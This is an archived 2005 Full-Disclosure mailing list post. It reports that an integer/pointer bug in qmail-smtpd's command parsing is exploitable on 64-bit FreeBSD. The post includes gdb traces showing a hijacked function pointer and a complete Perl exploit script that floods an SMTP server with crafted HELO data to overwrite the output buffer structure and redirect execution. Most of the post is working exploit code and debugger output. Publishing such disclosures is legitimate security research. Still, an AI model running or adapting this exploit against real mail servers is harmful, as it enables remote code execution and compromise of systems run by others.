From: Georgi Guninski (guninskiguninski.com)
Date: Sun May 15 2005 - 07:48:49 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Fri, May 06, 2005 at 04:01:07PM +0300, Georgi Guninski wrote:
>
> 2. pointer + signed int in commands.c
> int i;
> ...
> i = str_chr(cmd.s,' ');
> ...
> cmd.s[i] = 0;
>

problem #2 is exploitable at least on freebsd 5.4 amd64 with a lot of
virtual memory.

original djb's qmail was compiled with debug info, no optimizations and not
stripped.

Breakpoint 1, commands (ss=0x507520, c=0x507540) at commands.c:34
34 cmd.s[i] = 0;
(gdb) p cmd
$12 = {s = 0x4b507000 'Ь' <repeats 200 times>..., len = 3036683527,
           ^^^^^^^^^^
  a = 3184650962}
(gdb) p i
$13 = -1258283773
(gdb) p &cmd.s[i]
$14 = 0x508d03 "K"
(gdb) next
36 for (i = 0;c[i].text;++i) if (case_equals(c[i].text,cmd.s)) break;
(gdb) p cmd
$15 = {s = 0x507000 " server failed (#4.4.2)", len = 3036683527,
       ^^^^^^^^^^^^^
  a = 3184650962}
(gdb) p &ssout
$16 = (substdio *) 0x507500
(gdb) p &ssout.op
$17 = (int (**)()) 0x507518
(gdb) cont

Program received signal SIGTRAP, Trace/breakpoint trap.
0x000000000050cbac in ?? ()
(gdb) x/i $rip
0x50cbac: int3
(gdb) p ssout
$18 = {
  x = 0x102030405060708 <Error reading address 0x102030405060708: Bad address>, p = 0, n = 32, fd = 2, op = 0x50cbab}
(gdb) info stack
#0 0x000000000050cbac in ?? ()
#1 0x0000000000405bce in allwrite (op=0x50cbab, fd=2,
    buf=0x102030405060708 <Error reading address 0x102030405060708: Bad address>, len=16) at substdo.c:15
#2 0x0000000000405c63 in substdio_flush (s=0x507500) at substdo.c:35
#3 0x0000000000405d6e in substdio_put (s=0x507500,
    buf=0x406988 "502 unimplemented (#5.5.1)\r\n", len=28) at substdo.c:64
#4 0x0000000000405efc in substdio_puts (s=0x507500,
    buf=0x406988 "502 unimplemented (#5.5.1)\r\n") at substdo.c:100
#5 0x0000000000400daf in out (s=0x406988 "502 unimplemented (#5.5.1)\r\n")
    at qmail-smtpd.c:43
#6 0x0000000000400f13 in err_unimpl () at qmail-smtpd.c:54

(gdb) x/i helohost.s
0x50c000: int3
(gdb) p &cmd
$19 = (stralloc *) 0x508d00

qmlong-pubvvv5.pl - run on freebsd 5.4 amd64

------------------------
#!/usr/bin/perl -w

# copyright georgi guninski
# cannot be used in vulnerability databases

use IO::Socket;

my $host=$ARGV[0] || "localhost";
my $port=$ARGV[1] || 25;

my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host,
        PeerPort=>$port) || die("socket");

#my $sock;
#open ($sock, '+>',"/dev/null") || die("open");

##my $wriaddr = 0xb5bfa660 - 0x140;
my $wriaddr = 0xb5001e43 - 0x140;

my $wrimeg = int($wriaddr/(1024*1024)) ;
my $wrioff = $wriaddr % (1024*1024) ;

my $headdr = 0x42aa6000;
my $heameg = int($headdr/(1024*1024));
my $heaoff = $headdr % (1024*1024);

print $wrimeg . " " . $wrioff;

my $payload="\xcc" x (1024*1024);
my $i=0;
print $sock "HELO ";
while(42)
{
        print $sock $payload;
        $i++;

        print "${i}\n";
 if ($i == $heameg) {last;}
}
print $sock "v" x $heaoff;
print $sock "\r\n";
print "\nHELO sent\n";

$i=0;
while(42)
{
        print $sock $payload;
        $i++;
        print "${i}\n";
         if ($i == $wrimeg) {last;}
}

my $zer1 = "v" x $wrioff . " vvv\r\n";
print $zer1;
print $sock $zer1;
print "\nspace/zero sent\n";
$i=0;

my $vvover= "AB" . ("v" x (0x500-2));

$vvover .= pack("Q",0x0102030405060708); #x
$vvover .= pack("I",0x10);
$vvover .= pack("I",0x20);
$vvover .= pack("I",0x2);
$vvover .= pack("I",0x42);
$vvover .= pack("Q",0x50cbab); #op

$vvover .= "\x21" . "\n" x 100;
## ^^^ ssin.x + 1
print $sock $vvover;

print "\nprobably done\n";
while(42) {};

--
where do you want bill gates to go today?

** junk
 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]